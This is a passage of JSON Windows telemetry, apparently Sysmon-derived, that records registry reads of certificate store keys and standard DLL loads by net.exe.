"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "srvcli.dll", - "image_path": "C:\\Windows\\System32\\srvcli.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909330000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\My", - "registry_value": "My", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "vmhgfs.dll", - "image_path": "C:\\Windows\\System32\\vmhgfs.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "drprov.dll", - "image_path": "C:\\Windows\\System32\\drprov.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909490000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "winsta.dll", - "image_path": "C:\\Windows\\System32\\winsta.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "ntlanman.dll", - "image_path": "C:\\Windows\\System32\\ntlanman.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 